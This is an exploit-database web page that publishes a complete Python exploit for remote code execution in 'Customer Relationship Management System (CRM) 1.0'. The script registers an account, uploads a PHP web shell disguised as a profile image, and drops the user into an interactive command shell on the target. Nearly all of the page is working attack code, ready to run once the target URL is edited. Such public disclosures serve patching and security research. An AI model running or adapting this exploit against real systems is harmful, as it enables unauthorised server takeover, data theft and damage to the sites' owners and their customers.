customer relationship management system (crm) 1.0 remote code execution
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability Code...
 Code...
				
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution # Date: 21.06.2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip # Version: 1.x # Tested on: Ubuntu # REQUREMENTS # # run pip3 install requests colorama beautifulsoup4 # DESCRIPTION # # # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option # # Exploit Working: # # 1. Starting a session with the server # # 2. Registering a user hackerctf : hackerctf and adding payload in image # # 3. Finding the uploaded file location in the username image tag # # 4. Runing the payload file to give a shell #!/usr/bin/python3 import requests , time from bs4 import BeautifulSoup as bs from colorama import Fore, Back, Style # Variables : change the URL according to need URL="http://192.168.0.245/crm/" # CHANGE THIS shellcode = "<?php system($_GET['cmd']);?>" filename = "shell.php" content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"} authdata={"username":"hackerctf","password":"hackerctf"} def format_text(title,item): cr = '\r\n' section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr item=str(item) text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET return text ShellSession = requests.Session() response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")}) response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata) response = ShellSession.get(URL + "customer/") soup = bs(response.text,"html.parser") location= soup.find('img')['src'] #print statements print(format_text("Target",URL),end='') print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='') print(format_text("shell location",location),end='') print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) while True: cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET) if cmd == 'exit': break print(ShellSession.get(location + "?cmd="+cmd).content.decode())
Customer relationship management system (crm) 1.0 remote code execution Vulnerability / Exploit Source : Customer relationship management system (crm) 1.0 remote code execution
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes